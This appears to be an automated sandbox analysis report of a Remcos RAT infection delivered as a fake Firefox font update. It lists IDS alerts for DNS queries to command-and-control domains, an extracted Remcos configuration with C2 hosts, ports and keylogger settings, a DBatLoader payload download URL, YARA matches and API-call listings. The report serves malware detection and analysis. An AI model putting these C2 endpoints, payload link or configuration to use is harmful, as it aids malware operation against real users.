ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T21:20:00.748532+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.217.19.238	443	TCP
2024-11-30T21:20:03.715665+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	142.250.181.33	443	TCP

ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T21:20:14.399771+0100	2052851	1	A Network Trojan was detected	192.168.2.4	59343	1.1.1.1	53	UDP
2024-11-30T21:20:19.811277+0100	2052851	1	A Network Trojan was detected	192.168.2.4	53547	1.1.1.1	53	UDP
2024-11-30T21:20:24.638699+0100	2052851	1	A Network Trojan was detected	192.168.2.4	65126	1.1.1.1	53	UDP
2024-11-30T21:20:29.344915+0100	2052851	1	A Network Trojan was detected	192.168.2.4	50667	1.1.1.1	53	UDP
2024-11-30T21:20:35.170342+0100	2052851	1	A Network Trojan was detected	192.168.2.4	56437	1.1.1.1	53	UDP
2024-11-30T21:20:41.037495+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60974	1.1.1.1	53	UDP
2024-11-30T21:20:46.866140+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60471	1.1.1.1	53	UDP
2024-11-30T21:20:51.612708+0100	2052851	1	A Network Trojan was detected	192.168.2.4	52634	1.1.1.1	53	UDP
2024-11-30T21:20:56.331584+0100	2052851	1	A Network Trojan was detected	192.168.2.4	65535	1.1.1.1	53	UDP
2024-11-30T21:21:01.481594+0100	2052851	1	A Network Trojan was detected	192.168.2.4	64085	1.1.1.1	53	UDP
2024-11-30T21:21:06.610152+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51686	1.1.1.1	53	UDP
2024-11-30T21:21:11.440707+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63256	1.1.1.1	53	UDP
2024-11-30T21:21:16.223571+0100	2052851	1	A Network Trojan was detected	192.168.2.4	55983	1.1.1.1	53	UDP
2024-11-30T21:21:21.060028+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60681	1.1.1.1	53	UDP
2024-11-30T21:21:26.142193+0100	2052851	1	A Network Trojan was detected	192.168.2.4	53764	1.1.1.1	53	UDP
2024-11-30T21:21:31.042434+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63174	1.1.1.1	53	UDP
2024-11-30T21:21:36.037108+0100	2052851	1	A Network Trojan was detected	192.168.2.4	65098	1.1.1.1	53	UDP
2024-11-30T21:21:41.032602+0100	2052851	1	A Network Trojan was detected	192.168.2.4	64170	1.1.1.1	53	UDP
2024-11-30T21:21:46.033448+0100	2052851	1	A Network Trojan was detected	192.168.2.4	58629	1.1.1.1	53	UDP
2024-11-30T21:21:50.893873+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51471	1.1.1.1	53	UDP
2024-11-30T21:21:56.174391+0100	2052851	1	A Network Trojan was detected	192.168.2.4	62933	1.1.1.1	53	UDP
2024-11-30T21:22:01.033886+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51698	1.1.1.1	53	UDP
2024-11-30T21:22:06.033983+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63067	1.1.1.1	53	UDP
2024-11-30T21:22:11.038041+0100	2052851	1	A Network Trojan was detected	192.168.2.4	61198	1.1.1.1	53	UDP
2024-11-30T21:22:16.186365+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63585	1.1.1.1	53	UDP
2024-11-30T21:22:21.034494+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63071	1.1.1.1	53	UDP
2024-11-30T21:22:25.897210+0100	2052851	1	A Network Trojan was detected	192.168.2.4	54363	1.1.1.1	53	UDP
2024-11-30T21:22:30.893976+0100	2052851	1	A Network Trojan was detected	192.168.2.4	52611	1.1.1.1	53	UDP
2024-11-30T21:22:36.033180+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51362	1.1.1.1	53	UDP
2024-11-30T21:22:41.208520+0100	2052851	1	A Network Trojan was detected	192.168.2.4	49263	1.1.1.1	53	UDP
2024-11-30T21:22:46.032603+0100	2052851	1	A Network Trojan was detected	192.168.2.4	64192	1.1.1.1	53	UDP
2024-11-30T21:22:51.033308+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60726	1.1.1.1	53	UDP
2024-11-30T21:22:51.174865+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60726	1.1.1.1	53	UDP
2024-11-30T21:22:56.032219+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51822	1.1.1.1	53	UDP
2024-11-30T21:23:01.039455+0100	2052851	1	A Network Trojan was detected	192.168.2.4	51352	1.1.1.1	53	UDP
2024-11-30T21:23:06.042884+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60161	1.1.1.1	53	UDP
2024-11-30T21:23:10.894462+0100	2052851	1	A Network Trojan was detected	192.168.2.4	54466	1.1.1.1	53	UDP
2024-11-30T21:23:16.033884+0100	2052851	1	A Network Trojan was detected	192.168.2.4	59365	1.1.1.1	53	UDP
2024-11-30T21:23:16.174874+0100	2052851	1	A Network Trojan was detected	192.168.2.4	59365	1.1.1.1	53	UDP
2024-11-30T21:23:21.056906+0100	2052851	1	A Network Trojan was detected	192.168.2.4	57995	1.1.1.1	53	UDP
2024-11-30T21:23:26.032262+0100	2052851	1	A Network Trojan was detected	192.168.2.4	54360	1.1.1.1	53	UDP
2024-11-30T21:23:31.323503+0100	2052851	1	A Network Trojan was detected	192.168.2.4	49982	1.1.1.1	53	UDP
2024-11-30T21:23:36.042310+0100	2052851	1	A Network Trojan was detected	192.168.2.4	63348	1.1.1.1	53	UDP
2024-11-30T21:23:41.034582+0100	2052851	1	A Network Trojan was detected	192.168.2.4	50105	1.1.1.1	53	UDP
2024-11-30T21:23:46.033505+0100	2052851	1	A Network Trojan was detected	192.168.2.4	53292	1.1.1.1	53	UDP
2024-11-30T21:23:51.089996+0100	2052851	1	A Network Trojan was detected	192.168.2.4	58396	1.1.1.1	53	UDP
2024-11-30T21:23:55.896119+0100	2052851	1	A Network Trojan was detected	192.168.2.4	59617	1.1.1.1	53	UDP
2024-11-30T21:24:01.032838+0100	2052851	1	A Network Trojan was detected	192.168.2.4	58989	1.1.1.1	53	UDP
2024-11-30T21:24:01.175005+0100	2052851	1	A Network Trojan was detected	192.168.2.4	58989	1.1.1.1	53	UDP
2024-11-30T21:24:06.733108+0100	2052851	1	A Network Trojan was detected	192.168.2.4	60223	1.1.1.1	53	UDP

ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T21:20:14.960142+0100	2052849	1	A Network Trojan was detected	192.168.2.4	62093	1.1.1.1	53	UDP
2024-11-30T21:20:19.953778+0100	2052849	1	A Network Trojan was detected	192.168.2.4	61155	1.1.1.1	53	UDP
2024-11-30T21:20:25.968305+0100	2052849	1	A Network Trojan was detected	192.168.2.4	51046	1.1.1.1	53	UDP
2024-11-30T21:20:31.508606+0100	2052849	1	A Network Trojan was detected	192.168.2.4	58377	1.1.1.1	53	UDP
2024-11-30T21:20:36.414866+0100	2052849	1	A Network Trojan was detected	192.168.2.4	52231	1.1.1.1	53	UDP
2024-11-30T21:20:41.207197+0100	2052849	1	A Network Trojan was detected	192.168.2.4	54616	1.1.1.1	53	UDP
2024-11-30T21:20:47.011625+0100	2052849	1	A Network Trojan was detected	192.168.2.4	52810	1.1.1.1	53	UDP
2024-11-30T21:20:52.775781+0100	2052849	1	A Network Trojan was detected	192.168.2.4	53910	1.1.1.1	53	UDP
2024-11-30T21:20:57.410476+0100	2052849	1	A Network Trojan was detected	192.168.2.4	64562	1.1.1.1	53	UDP
2024-11-30T21:21:02.425920+0100	2052849	1	A Network Trojan was detected	192.168.2.4	52150	1.1.1.1	53	UDP
2024-11-30T21:21:07.395180+0100	2052849	1	A Network Trojan was detected	192.168.2.4	49533	1.1.1.1	53	UDP
2024-11-30T21:21:12.097825+0100	2052849	1	A Network Trojan was detected	192.168.2.4	53613	1.1.1.1	53	UDP
2024-11-30T21:21:17.114683+0100	2052849	1	A Network Trojan was detected	192.168.2.4	51516	1.1.1.1	53	UDP
2024-11-30T21:21:21.925966+0100	2052849	1	A Network Trojan was detected	192.168.2.4	52789	1.1.1.1	53	UDP
2024-11-30T21:21:26.914161+0100	2052849	1	A Network Trojan was detected	192.168.2.4	51596	1.1.1.1	53	UDP
2024-11-30T21:21:31.894876+0100	2052849	1	A Network Trojan was detected	192.168.2.4	53224	1.1.1.1	53	UDP
2024-11-30T21:21:36.899306+0100	2052849	1	A Network Trojan was detected	192.168.2.4	51254	1.1.1.1	53	UDP
2024-11-30T21:21:41.897578+0100	2052849	1	A Network Trojan was detected	192.168.2.4	56769	1.1.1.1	53	UDP
2024-11-30T21:21:46.893853+0100	2052849	1	A Network Trojan was detected	192.168.2.4	58691	1.1.1.1	53	UDP
2024-11-30T21:21:51.893728+0100	2052849	1	A Network Trojan was detected	192.168.2.4	58065	1.1.1.1	53	UDP
2024-11-30T21:21:56.894636+0100	2052849	1	A Network Trojan was detected	192.168.2.4	59056	1.1.1.1	53	UDP
2024-11-30T21:22:01.894428+0100	2052849	1	A Network Trojan was detected	192.168.2.4	63586	1.1.1.1	53	UDP
2024-11-30T21:22:06.894415+0100	2052849	1	A Network Trojan was detected	192.168.2.4	61809	1.1.1.1	53	UDP
2024-11-30T21:22:11.907482+0100	2052849	1	A Network Trojan was detected	192.168.2.4	63464	1.1.1.1	53	UDP
2024-11-30T21:22:16.894491+0100	2052849	1	A Network Trojan was detected	192.168.2.4	53097	1.1.1.1	53	UDP
2024-11-30T21:22:21.894245+0100	2052849	1	A Network Trojan was detected	192.168.2.4	64866	1.1.1.1	53	UDP
2024-11-30T21:22:26.895645+0100	2052849	1	A Network Trojan was detected	192.168.2.4	50244	1.1.1.1	53	UDP
2024-11-30T21:22:31.896283+0100	2052849	1	A Network Trojan was detected	192.168.2.4	54580	1.1.1.1	53	UDP
2024-11-30T21:22:36.893931+0100	2052849	1	A Network Trojan was detected	192.168.2.4	57367	1.1.1.1	53	UDP
2024-11-30T21:22:41.894481+0100	2052849	1	A Network Trojan was detected	192.168.2.4	58242	1.1.1.1	53	UDP
2024-11-30T21:22:46.894748+0100	2052849	1	A Network Trojan was detected	192.168.2.4	57891	1.1.1.1	53	UDP
2024-11-30T21:22:51.893869+0100	2052849	1	A Network Trojan was detected	192.168.2.4	54689	1.1.1.1	53	UDP
2024-11-30T21:22:56.894174+0100	2052849	1	A Network Trojan was detected	192.168.2.4	56622	1.1.1.1	53	UDP
2024-11-30T21:23:02.390722+0100	2052849	1	A Network Trojan was detected	192.168.2.4	52641	1.1.1.1	53	UDP
2024-11-30T21:23:06.894731+0100	2052849	1	A Network Trojan was detected	192.168.2.4	49395	1.1.1.1	53	UDP
2024-11-30T21:23:11.893924+0100	2052849	1	A Network Trojan was detected	192.168.2.4	59915	1.1.1.1	53	UDP
2024-11-30T21:23:16.894492+0100	2052849	1	A Network Trojan was detected	192.168.2.4	50797	1.1.1.1	53	UDP
2024-11-30T21:23:21.894498+0100	2052849	1	A Network Trojan was detected	192.168.2.4	50624	1.1.1.1	53	UDP
2024-11-30T21:23:26.896938+0100	2052849	1	A Network Trojan was detected	192.168.2.4	65343	1.1.1.1	53	UDP
2024-11-30T21:23:31.897394+0100	2052849	1	A Network Trojan was detected	192.168.2.4	49990	1.1.1.1	53	UDP
2024-11-30T21:23:36.893954+0100	2052849	1	A Network Trojan was detected	192.168.2.4	58303	1.1.1.1	53	UDP
2024-11-30T21:23:41.894501+0100	2052849	1	A Network Trojan was detected	192.168.2.4	51942	1.1.1.1	53	UDP
2024-11-30T21:23:46.896096+0100	2052849	1	A Network Trojan was detected	192.168.2.4	62286	1.1.1.1	53	UDP
2024-11-30T21:23:51.894078+0100	2052849	1	A Network Trojan was detected	192.168.2.4	62782	1.1.1.1	53	UDP
2024-11-30T21:23:56.894437+0100	2052849	1	A Network Trojan was detected	192.168.2.4	57578	1.1.1.1	53	UDP
2024-11-30T21:24:01.894548+0100	2052849	1	A Network Trojan was detected	192.168.2.4	53101	1.1.1.1	53	UDP

ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T21:20:14.165777+0100	2052852	1	A Network Trojan was detected	192.168.2.4	58194	1.1.1.1	53	UDP
2024-11-30T21:20:19.664894+0100	2052852	1	A Network Trojan was detected	192.168.2.4	51083	1.1.1.1	53	UDP
2024-11-30T21:20:24.496412+0100	2052852	1	A Network Trojan was detected	192.168.2.4	61257	1.1.1.1	53	UDP
2024-11-30T21:20:29.206114+0100	2052852	1	A Network Trojan was detected	192.168.2.4	57310	1.1.1.1	53	UDP
2024-11-30T21:20:35.031611+0100	2052852	1	A Network Trojan was detected	192.168.2.4	50236	1.1.1.1	53	UDP
2024-11-30T21:20:40.879401+0100	2052852	1	A Network Trojan was detected	192.168.2.4	49844	1.1.1.1	53	UDP
2024-11-30T21:20:46.690949+0100	2052852	1	A Network Trojan was detected	192.168.2.4	57490	1.1.1.1	53	UDP
2024-11-30T21:20:51.472702+0100	2052852	1	A Network Trojan was detected	192.168.2.4	58067	1.1.1.1	53	UDP
2024-11-30T21:20:56.191186+0100	2052852	1	A Network Trojan was detected	192.168.2.4	49950	1.1.1.1	53	UDP
2024-11-30T21:21:01.336260+0100	2052852	1	A Network Trojan was detected	192.168.2.4	51070	1.1.1.1	53	UDP
2024-11-30T21:21:06.472411+0100	2052852	1	A Network Trojan was detected	192.168.2.4	60083	1.1.1.1	53	UDP
2024-11-30T21:21:11.300691+0100	2052852	1	A Network Trojan was detected	192.168.2.4	55617	1.1.1.1	53	UDP
2024-11-30T21:21:16.081947+0100	2052852	1	A Network Trojan was detected	192.168.2.4	64835	1.1.1.1	53	UDP
2024-11-30T21:21:20.911866+0100	2052852	1	A Network Trojan was detected	192.168.2.4	51115	1.1.1.1	53	UDP
2024-11-30T21:21:26.003395+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56146	1.1.1.1	53	UDP
2024-11-30T21:21:30.894482+0100	2052852	1	A Network Trojan was detected	192.168.2.4	50790	1.1.1.1	53	UDP
2024-11-30T21:21:35.895926+0100	2052852	1	A Network Trojan was detected	192.168.2.4	57528	1.1.1.1	53	UDP
2024-11-30T21:21:40.893780+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56028	1.1.1.1	53	UDP
2024-11-30T21:21:45.894664+0100	2052852	1	A Network Trojan was detected	192.168.2.4	63060	1.1.1.1	53	UDP
2024-11-30T21:21:51.032885+0100	2052852	1	A Network Trojan was detected	192.168.2.4	52245	1.1.1.1	53	UDP
2024-11-30T21:21:55.976395+0100	2052852	1	A Network Trojan was detected	192.168.2.4	64574	1.1.1.1	53	UDP
2024-11-30T21:22:00.894512+0100	2052852	1	A Network Trojan was detected	192.168.2.4	63380	1.1.1.1	53	UDP
2024-11-30T21:22:05.893787+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56631	1.1.1.1	53	UDP
2024-11-30T21:22:10.893994+0100	2052852	1	A Network Trojan was detected	192.168.2.4	60693	1.1.1.1	53	UDP
2024-11-30T21:22:16.047392+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56732	1.1.1.1	53	UDP
2024-11-30T21:22:20.894190+0100	2052852	1	A Network Trojan was detected	192.168.2.4	52906	1.1.1.1	53	UDP
2024-11-30T21:22:26.039719+0100	2052852	1	A Network Trojan was detected	192.168.2.4	58645	1.1.1.1	53	UDP
2024-11-30T21:22:31.032671+0100	2052852	1	A Network Trojan was detected	192.168.2.4	51940	1.1.1.1	53	UDP
2024-11-30T21:22:35.894408+0100	2052852	1	A Network Trojan was detected	192.168.2.4	63627	1.1.1.1	53	UDP
2024-11-30T21:22:41.044412+0100	2052852	1	A Network Trojan was detected	192.168.2.4	54755	1.1.1.1	53	UDP
2024-11-30T21:22:45.894345+0100	2052852	1	A Network Trojan was detected	192.168.2.4	51118	1.1.1.1	53	UDP
2024-11-30T21:22:50.894264+0100	2052852	1	A Network Trojan was detected	192.168.2.4	52256	1.1.1.1	53	UDP
2024-11-30T21:22:55.893930+0100	2052852	1	A Network Trojan was detected	192.168.2.4	49957	1.1.1.1	53	UDP
2024-11-30T21:23:00.893949+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56438	1.1.1.1	53	UDP
2024-11-30T21:23:05.900296+0100	2052852	1	A Network Trojan was detected	192.168.2.4	56303	1.1.1.1	53	UDP
2024-11-30T21:23:11.033781+0100	2052852	1	A Network Trojan was detected	192.168.2.4	49702	1.1.1.1	53	UDP
2024-11-30T21:23:15.893889+0100	2052852	1	A Network Trojan was detected	192.168.2.4	50222	1.1.1.1	53	UDP
2024-11-30T21:23:20.912006+0100	2052852	1	A Network Trojan was detected	192.168.2.4	53983	1.1.1.1	53	UDP
2024-11-30T21:23:25.893898+0100	2052852	1	A Network Trojan was detected	192.168.2.4	57265	1.1.1.1	53	UDP
2024-11-30T21:23:31.042070+0100	2052852	1	A Network Trojan was detected	192.168.2.4	50622	1.1.1.1	53	UDP
2024-11-30T21:23:35.904215+0100	2052852	1	A Network Trojan was detected	192.168.2.4	50889	1.1.1.1	53	UDP
2024-11-30T21:23:40.894723+0100	2052852	1	A Network Trojan was detected	192.168.2.4	63084	1.1.1.1	53	UDP
2024-11-30T21:23:45.894596+0100	2052852	1	A Network Trojan was detected	192.168.2.4	54035	1.1.1.1	53	UDP
2024-11-30T21:23:50.933762+0100	2052852	1	A Network Trojan was detected	192.168.2.4	63629	1.1.1.1	53	UDP
2024-11-30T21:23:56.039056+0100	2052852	1	A Network Trojan was detected	192.168.2.4	61391	1.1.1.1	53	UDP
2024-11-30T21:24:00.894426+0100	2052852	1	A Network Trojan was detected	192.168.2.4	61632	1.1.1.1	53	UDP
2024-11-30T21:24:06.593437+0100	2052852	1	A Network Trojan was detected	192.168.2.4	52272	1.1.1.1	53	UDP

ET MALWARE DNS Query to Remcos Related Domain (myumysmeetr .ddns .net)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T21:20:14.729773+0100	2052853	1	A Network Trojan was detected	192.168.2.4	58098	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: mysweeterbk.ddns.net

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["tre1ms.freeddns.org:2404:1", "freshmysweeterbk.ddns.net:2404:1", "mysweeterbk.ddns.net:2404:1", "bbhmeetre1ms.freeddns.org:2404:1", "myumysmeetr.ddns.net:2404:1", "meetre1ms.freeddns.org:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B5YX7T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "ANYDESKS"}
Source: 17.3.esentutl.exe.5440000.0.raw.unpack	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\AnyDesk.PIF	ReversingLabs: Detection: 23%
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	ReversingLabs: Detection: 23%

Yara detected Remcos RAT

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.7% probability

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,	6_2_00007FF6A29D2C2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF6A29D2F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A023E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,	6_2_00007FF6A2A023E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A98404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF6A2A98404
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29E4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A56374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,	6_2_00007FF6A2A56374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A52358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,	6_2_00007FF6A2A52358
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EE3B0 #357,#357,CryptDecodeObject,LocalFree,	6_2_00007FF6A29EE3B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29D44E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A324D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,	6_2_00007FF6A2A324D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A8E516
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,	6_2_00007FF6A29EC514
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,	6_2_00007FF6A2A3A450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,	6_2_00007FF6A2A3C450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A58488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A58488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,	6_2_00007FF6A2A4A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,	6_2_00007FF6A2AC6214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF6A2A5E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,	6_2_00007FF6A2A9A1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC613C CryptDecodeObjectEx,	6_2_00007FF6A2AC613C
